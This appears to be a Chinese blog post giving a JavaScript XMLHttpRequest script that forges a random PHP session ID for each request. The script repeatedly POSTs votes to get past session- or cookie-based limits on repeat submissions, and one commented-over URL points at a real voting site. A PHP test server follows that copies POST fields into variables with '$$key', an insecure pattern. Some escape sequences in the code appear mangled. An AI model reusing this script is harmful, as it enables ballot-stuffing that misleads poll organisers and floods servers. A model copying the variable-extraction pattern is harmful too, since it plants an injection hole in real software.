如果是基于session或者cookie做防止刷新,那么,我可以伪造状态,用xmlhttp把服务器刷爆 代码如下,服务器端的代码在最后一个textarea里。
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<title> xmlhttp</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<script language="javascript" type="text/javascript" src="fckXML.js"></script>
<script language="javascript" type="text/javascript">
<!--
function SetCookie(sName, sValue)
{
date = new Date();
document.cookie = sName + "=" + escape(sValue) + "; expires=" + date.toGMTString();
}
if ( window.XMLHttpRequest ) // Gecko
oXmlHttp = new XMLHttpRequest() ;
else if ( window.ActiveXObject ) // IE
oXmlHttp = new ActiveXObject("MsXml2.XmlHttp") ;
/*
看了并分析了服务器端的结果,依靠xmlhttp来伪造ip是不可能的了。
setRequestHeader
单独指定请求的某个http头
你的客户机ip不在其中,如果服务器端是基于ip防止刷新的,你就别费心了呗,除非是用c写socket自定义ip包。而且能确保头不被网关修改。
如果服务器是asp的基于session认证的,呵呵,那怎么办哪。用c写socket程序?怎么伪造我不知道了。
如果服务器是php的基于session或者cookie防止刷新,呵呵,那我就ok了。
下一步计划,搞清楚asp的session机制。反正不是依靠cookie的。我没办法了,除非寻找c语言的解决方案。
*/
urlToCall = "http://toupiao.scol.com.cn/toupiao_save.asp";
urlToCall = "http://develop-3/test/jstest/xmlhttp/server.php";
urlToCall = "http://test.bai.com/jstest/xmlhttp/server.php";
host = "test.bai.com";
var bAsync = 1 ;
result = '';
i = 1;
n = 2;
function zuobiStart()
{
//打开url
oXmlHttp.open( "POST", urlToCall, bAsync ) ;
//伪造ssessionid 欺骗服务器,服务器的本次会话session就重新置换了,所有的session就失去意义了。
phpsessid = Math.random();
id2 = Math.random();
phpsess = phpsessid.toString()+'11111'+id2.toString();
phpsess = phpsess.replace( //./g,"0" );
phpsess = phpsess.substr( 0,32 );
cook ="PHPSESSID="+phpsess+"; ";
//设置PHPSESSID,由于php的session依靠cookie来实现,所以这样就实现了本次会话session的刷新
document.cookie=cook;
//以下是可以修改的头
oXmlHttp.setRequestHeader ( "ADDR000", 'test' );
oXmlHttp.setRequestHeader ( "User-Agent", "Mozilla/4.0 " );
oXmlHttp.setRequestHeader( "accept-language", "zh_cn");
oXmlHttp.setRequestHeader( "CONTENT-TYPE","application/x-www-form-urlencoded");
oXmlHttp.setRequestHeader( "accept-encoding", "gzip, deflate");
oXmlHttp.setRequestHeader( "CONNECTION", "keep-alive");
oXmlHttp.setRequestHeader( "accept", "image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, */*");
//以下是不可以修改的头,改了服务器也不认
oXmlHttp.setRequestHeader( "Referer", 'example.test.com');
oXmlHttp.setRequestHeader ("Cookie", cook);
oXmlHttp.setRequestHeader ("HOST", host );
oXmlHttp.setRequestHeader( "content-length", "11");
oXmlHttp.setRequestHeader( "CACHE_CONTROL", "kcache");
params = 'item_button=45&topic=5';
//发送测试结果
oXmlHttp.send(params) ;
//测试返回结果
oXmlHttp.onreadystatechange = function()
{
if ( oXmlHttp.readyState == 4 )
{
result += oXmlHttp.responseText;
}
}
//
i++;
//跳出循环
if (i>n){
//alert("end/n"+i.toString()+"/n"+n.toString());
infoObj = document.getElementById('info');
infoObj.value = result;
//info.value = result+"慰问慰问";
clearInterval(flushtimerID);
}
}//end func
//结束
flushtimerID = window.setInterval(zuobiStart,100);
//-->
</script>
</head>
<body>
<textarea name="info" id="info" rows="10" cols="90" >
31号 杨杰晰
<?php
require_once('echo.php');
session_start();
//pr($_COOKIE);pr($_GET);pr($_POST);
//pr($_SESSION);pr($_COOKIE);
if ( $_SESSION['posted'] == 1 ) {
echo"error";
DIE;
}
//get cookie number
$num = $_COOKIE['currNum'];
$expires = time()+60*60*24*365;
if (!isset($_COOKIE['currNum'])) {
setcookie('currNum' , 1 , $expires );
echo "cookie没有设置/n";
}
else {
$num++;
setcookie('currNum',$num);
echo $num;
}
?>
<style type="text/css">
*{font:12px verdana;}
</style>
<pre>
<?php
foreach ($_POST as $key=>$v) {
$$key = $v;
$str .=$v."/r/n";
//echo "$v /n";
}
//print_R($_SERVER);
foreach ($_SERVER as $k=>$v) {
$str .=$k."=".$v."/n";
}
echo $str;
$fp = fopen("d:/tmp/".$num.".txt","wb");
//fwrite($fp,$str);
fclose($fp);
$_SESSION['posted'] = 1;
?>
